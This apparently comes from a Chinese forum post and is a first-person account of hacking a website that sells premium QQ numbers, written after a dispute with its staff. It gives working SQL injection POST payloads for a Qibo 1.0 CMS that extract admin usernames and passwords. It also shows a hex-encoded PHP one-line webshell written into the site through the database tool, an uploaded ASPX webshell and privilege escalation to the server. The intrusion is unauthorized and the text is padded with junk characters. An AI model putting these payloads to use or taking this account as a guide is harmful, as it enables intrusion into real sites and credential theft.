- N/ r5 l: x8 [( R( X- N
4 w; m* y( W& X @1 p
0 k4 @* _0 u7 o* ~- I
9 |5 K- s# Q& H$ K x 一、踩点寻找漏洞
' J: o4 Z1 x8 h! z! ^' f闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。 " r" @+ K% [% ^; f! P2 E
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下: , q$ q5 e# K, o! x
先注册一个用户,记住注册时候的邮箱以uid号,
m W h" {% ? v 3 |2 D) P# l7 j8 q' k
+ O4 I0 O" T4 B7 C1 [1 I
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下: 5 G {# U# K, \* Y! Y k: g5 \
: z2 e) `0 Q4 mtruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23 + B8 k3 |# {9 o# I
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
0 `# Z; R) ^- f# P; j
6 U- N) v& v5 p) ?7 U6 P确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23 , r4 D$ T& b0 _5 G$ h9 x/ Z* S
3 R" w: h- ]5 D C$ c8 F( e; ?# ?
& j: _0 v5 {2 _: v
解密进后台如图: 9 V# z% S& H" t; }% g" F
1 d4 l/ A, S( ]/ ?. _
A% U s5 j4 b3 i$ i: `, F5 p
3 e/ }, ]# |% \, M a5 H9 ]二、后台getwebshell
( [% {2 I9 w6 E/ u$ \- M8 h进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图: ; d* O% ]: M: E- t" Z B
9 H3 f- w" g8 ]7 U
: a& k1 X# d7 \/ y' _( | . J' E4 S& S. {1 O/ V
然后点确定,添加提示
' L* }& g, E- e6 Q7 x( a7 a
) \) A2 |, l; c- p% |
: w7 [0 m V, [3 |
7 U/ h& y# j/ J! J" B由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
7 E) V+ v* e0 l7 O1 Q+ d
" N3 {# M, r' D % v- m+ [& O5 b0 |; Z
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下 5 r9 D e& J4 @+ X+ l8 C- R( {
如图:
' A: H, g* F7 P3 [% t. ]( P* J( g
; h0 L4 Z- G4 Q
, k8 R1 W& `6 V3 R& V7 d 8 k$ m0 m+ h% j& D- o/ V
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开 : K" p% y% [: U# u. a& x2 m0 A
9 R& N. {9 b9 r, p2 @& _ 3 T) s/ s* N2 M2 g/ A3 z
$ L$ R, x2 ^ L% F
三、提权进服务器 0 U6 v- I2 X1 U
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
$ z+ N# O* C! G$ A
" _- V9 G( G( |( y! q- I) u& T & |1 M1 i7 B# g/ L2 @& ?- O+ c$ o
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图: ; g% x' v3 s k1 m& h" G
) u( r" J6 W% T' i% s5 d* M8 D! m" l* X
: F4 _- r E* | B. Q. ?" h. C然后登陆服务器如图:
4 C; |/ p9 Z5 `& g
3 T5 [1 i- z* z! j) \ 7 l. w7 X; P7 S4 _) B2 B! E
0 O+ x$ ^5 \& [, Q" w1 K: a! a+ U* X9 o: i' M; e( _) q
: n' h+ d4 ]4 o* `& Q
难怪普通刀连接不上,原来是有狗。 6 M2 H* I% }7 n/ {! a7 _8 l
) I3 \6 d7 g! {$ A
( f( D1 y# \8 e V4 \
0 D7 t7 z. I! v, L& k( X+ I 0 J8 `: E, |1 H: @
# |- F6 x' |7 y
8 N* @' r1 D% X$ _5 a! p2 ^ |